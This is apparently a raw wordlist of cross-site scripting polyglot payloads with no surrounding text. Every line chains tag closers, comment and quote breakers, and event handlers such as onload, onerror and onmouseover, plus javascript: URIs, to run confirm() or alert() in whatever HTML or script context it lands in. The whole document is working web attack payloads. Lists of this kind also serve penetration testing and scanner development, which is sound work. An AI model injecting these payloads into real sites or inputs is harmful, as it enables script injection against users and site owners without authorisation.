javascript:confirm()//</title></style></textarea></noscript></template></noembed><script>confirm()</script>-->\";confirm()//";confirm()//';confirm()//<script>confirm()</script><frame src="javascript:confirm()">` confirm()//<svg/onload=confirm()>*/confirm()/* 
javascript:confirm();//<img src=x:x onerror=confirm(1)>\";confirm();//";confirm();//';confirm();//`;confirm();// confirm();//*/confirm();//--></title></textarea></style></noscript></noembed></template></select></script><frame src=javascript:confirm()><svg onload=confirm()><!-- 
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
javascript:confirm(1)//\";confirm(1);<!--jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=confirm() )//%0D%0A%0d%0a//--><FRAME SRC="javascript:confirm(1);"></textarea></style></iframe></noscript></noembed></template></option></select></script><img src=x onerror=confirm(1)></title><script>confirm(1)</script><img src=0 onerror=confirm(1)><img src=x:x onerror=confirm(1)> confirm(1)// 
javascript:`/*</title></style></textarea></noscript></script></noembed></template></select/"/'/*--><frame onload=confirm()><svg/\"/*<svg onload=' /**/-confirm()//'>javascript:/*`/*\"/*'/*</noembed>"/*<frame src=javascript:/**/;confirm()//--></title></textarea></style></noscript></template></select></script><<svg/onload= confirm()//>
javascript:/*--></title></style></template></noscript></noembed></textarea></script><svg/onload='+/"/+/onclick=1/+/[*/[]/+confirm()//'>"><svg/onload=`+/"/+/onclick=/+/[*/[]/+confirm()//'>"><script>confirm()</script><frame src="javascript:confirm()"></frameset>+\"; confirm()//<img src onerror=confirm()>
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=confirm()//>
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=confirm()//> 
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=confirm()//>
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=confirm()//'>` 
javascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ confirm()//'">`
javascript:"/*'//`//\"//</template/</title/</textarea/</style/</noscript/</noembed/</script/--><script>/<i<frame */ onload=confirm()//</script>
javascript:"/*`/*\"/*'/*</stYle/</titLe/</teXtarEa/</nOscript></noembed></template></script/--><ScRipt>/*<i<frame/*/ onload=confirm()//</Script> 
javascript:`</template>\"///"//</script/--></title/'</style/</textarea/</noembed/</noscript><<script/>/<frame */; onload=confirm()//<</script>`
javascript:/*`//'//\"//</style></noscript></script>--></textarea></noembed></template></title><script>/<frame <svg"///*/ onload=confirm()//</script> 
javascript:/*"//'//`//\"//--></script></title></style></textarea></template></noembed></noscript><script>//<frame/<svg/*/onload= confirm()//</script> 
javascript:/*-->'//"//`//\"//</title></textarea></style></noscript></script></noembed></template><script>/*<frame/<svg */ onload=confirm()//</script> 
javascript:/*"/*'/*`/*\"/*</script/</title/</textarea/</style/</noscript></template></noembed>--><script>/*<svg <frame */ onload=confirm()//</script> 
javascript:/*"/*'/*\"/*`/*--></title></noembed></template></textarea></noscript></style></script><script>//<frame <svg */ onload=confirm()//</script> 